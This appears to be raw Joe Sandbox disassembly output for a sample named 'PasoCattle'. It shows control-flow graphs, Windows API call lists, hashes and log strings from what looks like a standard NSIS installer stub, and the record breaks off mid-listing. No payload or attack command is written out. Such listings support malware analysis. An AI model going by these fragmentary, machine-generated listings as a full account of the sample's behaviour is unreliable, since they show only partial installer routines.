4168->4170 4169 4062cf 11 API calls 4169->4180 4171 406ec9 4170->4171 4174 404f9e 25 API calls 4171->4174 4172 406cc7 72 API calls 4172->4180 4173 405e5c 2 API calls 4175 406dfa DeleteFileW 4173->4175 4176 406ed3 4174->4176 4175->4180 4177 406c94 42 API calls 4176->4177 4177->4179 4178 404f9e 25 API calls 4178->4161 4179->3921 4179->3922 4180->4155 4180->4161 4180->4169 4180->4172 4180->4173 4180->4178 4181 404f9e 25 API calls 4180->4181 4182 406c94 42 API calls 4180->4182 4184 406035 lstrcpynW 4180->4184 4181->4180 4182->4180 4183->4143 4184->4180 4185->4070 4930 401cb2 4931 40145c 18 API calls 4930->4931 4932 401c54 4931->4932 4933 4062cf 11 API calls 4932->4933 4934 401c64 4932->4934 4935 401c59 4933->4935 4936 406cc7 81 API calls 4935->4936 4936->4934 3717 4021b5 3718 40145c 18 API calls 3717->3718 3719 4021bb 3718->3719 3720 40145c 18 API calls 3719->3720 3721 4021c4 3720->3721 3722 40145c 18 API calls 3721->3722 3723 4021cd 3722->3723 3724 40145c 18 API calls 3723->3724 3725 4021d6 3724->3725 3726 404f9e 25 API calls 3725->3726 3727 4021e2 ShellExecuteW 3726->3727 3728 40221b 3727->3728 3729 40220d 3727->3729 3730 4062cf 11 API calls 3728->3730 3731 4062cf 11 API calls 3729->3731 3732 402230 3730->3732 3731->3728 4937 402238 4938 40145c 18 API calls 4937->4938 4939 40223e 4938->4939 4940 4062cf 11 API calls 4939->4940 4941 40224b 4940->4941 4942 404f9e 25 API calls 4941->4942 4943 402255 4942->4943 4944 405c6b 2 API calls 4943->4944 4945 40225b 4944->4945 4946 4062cf 11 API calls 4945->4946 4954 4022ac CloseHandle 4945->4954 4951 40226d 4946->4951 4948 4030e3 4949 402283 WaitForSingleObject 4950 402291 GetExitCodeProcess 4949->4950 4949->4951 4953 4022a3 4950->4953 4950->4954 4951->4949 4952 40635e 2 API calls 4951->4952 4951->4954 4952->4949 4956 405f7d wsprintfW 4953->4956 4954->4948 4956->4954 4957 404039 4958 404096 4957->4958 4959 404046 lstrcpynA lstrlenA 4957->4959 4959->4958 4960 404077 4959->4960 4960->4958 4961 404083 GlobalFree 4960->4961 4961->4958 4962 401eb9 4963 401f24 4962->4963 4966 401ec6 4962->4966 4964 401f53 GlobalAlloc 4963->4964 4968 401f28 4963->4968 4970 406831 18 API calls 4964->4970 4965 401ed5 4969 4062cf 11 API calls 4965->4969 4966->4965 4972 401ef7 4966->4972 4967 401f36 4986 406035 lstrcpynW 4967->4986 4968->4967 4971 4062cf 11 API calls 4968->4971 4981 401ee2 4969->4981 4974 401f46 4970->4974 4971->4967 4984 406035 lstrcpynW 4972->4984 4976 402708 4974->4976 4977 402387 GlobalFree 4974->4977 4977->4976 4978 401f06 4985 406035 lstrcpynW 4978->4985 4979 406831 18 API calls 4979->4981 4981->4976 4981->4979 4982 401f15 4987 406035 lstrcpynW 4982->4987 4984->4978 4985->4982 4986->4974 4987->4976

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                                                                                                      • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                                                                                                      • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                                                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                                                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                                                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                                                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                                                                                        • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                        • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,759223A0,00000000), ref: 00406902
                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00405313
                                                                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                                                                                                      • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 004053A2
                                                                                                                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                                                                                                      • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                                                                                                      • EmptyClipboard.USER32 ref: 0040543D
                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                                                                                                      • CloseClipboard.USER32 ref: 0040549A
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                      • String ID: New install of "%s" to "%s"${
                                                                                                                                                                      • API String ID: 2110491804-1641061399
                                                                                                                                                                      • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                      • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                                                                                                      • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                      • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                                                                                                                                                      APIs
                                                                                                                                                                      • #17.COMCTL32 ref: 004038CE
                                                                                                                                                                      • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                                                        • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                        • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                        • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                      • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                                                        • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                      • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                                                      • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                                                      • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                                                      • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                                                      • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                                                      • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                                                      • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                                                      • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                                                      • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                                                      • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                                                      • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                      • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                                                      • API String ID: 2435955865-3712954417
                                                                                                                                                                      • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                      • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                                                                                      • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                      • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                                                                      • String ID: jF
                                                                                                                                                                      • API String ID: 2295610775-3349280890
                                                                                                                                                                      • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                      • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                                                                                      • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                      • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                      • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 310444273-0
                                                                                                                                                                      • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                      • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                                                                                      • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                      • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                                                                                                                                                      APIs
                                                                                                                                                                      • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                      • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                      • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                      • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                      • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                      • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                      • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                      • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                      • SearchPathW.KERNEL32(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                      Strings
                                                                                                                                                                      • Rename: %s, xrefs: 004018F8
                                                                                                                                                                      • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                      • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                      • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                      • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                      • detailprint: %s, xrefs: 00401679
                                                                                                                                                                      • BringToFront, xrefs: 004016BD
                                                                                                                                                                      • Call: %d, xrefs: 0040165A
                                                                                                                                                                      • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                      • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                      • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                      • Jump: %d, xrefs: 00401602
                                                                                                                                                                      • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                      • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                      • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                      • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                      • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
